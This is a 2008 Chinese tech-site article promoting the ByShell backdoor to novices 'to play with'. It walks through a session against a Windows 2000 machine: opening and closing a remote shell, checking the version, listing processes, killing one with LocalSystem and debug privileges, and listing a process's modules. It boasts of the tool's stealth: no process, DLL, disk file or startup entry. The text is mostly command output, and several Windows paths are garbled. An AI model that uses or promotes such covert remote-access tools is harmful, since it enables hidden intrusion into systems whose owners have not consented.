Byshell后门:无进程无DLL无硬盘文件
http://tech.ddvip.com 2008年01月22日 社区交流 收藏本文
内容摘要:今天我们将给大家带来一个重量级后门的使用、编程方法,让广大新手朋友们有好后门玩,让编程技术爱好者有好的后门编程技术可以借鉴。当然,更多的新技术还等你去发掘。
2.获得并结束Shell:
#shell
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
C:WINNTsystem32>cd..
cd..
C:WINNT>cd..
cd..
C:>dir
dir
驱动器 C 中的卷没有标签。
卷的序列号是 CCB2-D751
C: 的目录
……省略
3 个文件 49,276 字节
7 个目录 124,207,104 可用字节
C:>endshell
shell terminated
#byver
ByShell server version 0.63
Released Dec 19,2004 Copyleft@ "by" co.ltd.
3.进程列举与Kill。这里有BUG,排列不整齐。
#pslist好了,就介绍这三个最普通的功能吧。其实在很多场合,这三个功能是最基本的功能,也是最难确保稳定性的三个问题疑难,不过这个后门最突出的特色应该是无进程、无DLL、无硬盘文件、无启动项的实现,在实际的使用过程中相信大家会发现它的优点,下面我们从设计和编程的角度来看这些功能是如何实现的。
process:
pid filename num_thread parentpid
8 System 43 0
184 smss.exe 6 8
208 csrss.exe 11 184
232 winlogon.exe 19 184
260 services.exe 31 232
272 lsass.exe 17 232
456 svchost.exe 11 260
488 SPOOLSV.EXE 14 260
524 msdtc.exe 21 260
636 svchost.exe 18 260
656 llssrv.exe 9 260
688 sqlservr.exe 28 260
776 winmgmt.exe 3 260
812 dfssvc.exe 2 260
832 inetinfo.exe 29 260
856 mssearch.exe 6 260
1224 svchost.exe 11 260
1176 explorer.exe 19 1172
1356 igfxtray.exe 2 1176
1404 PFWMain.exe 4 1176
1412 SOUNDMAN.EXE 2 1176
1428 realsched.exe 4 1176
1436 internat.exe 1 1176
1444 sqlmangr.exe 3 1176
1280 BitComet.exe 9 1176
328 notepad.exe 2 1176
1196 MDM.EXE 5 456
1512 conime.exe 1 1088
1520 cmd.exe 1 488
1504 by063cli.exe 1 1176
#pskill1428
OK,job was done,cuz we have localsystem & SE_DEBUG_NAME:)
#modlist1520
mods of 1520:
module_id module_name module_path
1 ntdll.dll C:WINNTSystem32
tdll.dll
1 KERNEL32.dll C:WINNTsystem32KERNEL32.dll
1 USER32.dll C:WINNTsystem32USER32.dll
1 GDI32.DLL C:WINNTsystem32GDI32.DLL
1 ADVAPI32.dll C:WINNTsystem32ADVAPI32.dll
1 RPCRT4.DLL C:WINNTsystem32RPCRT4.DLL
1 MSVCRT.dll C:WINNTsystem32MSVCRT.dll
1 IMM32.DLL C:WINNTSystem32IMM32.DLL
#
责编:豆豆技术应用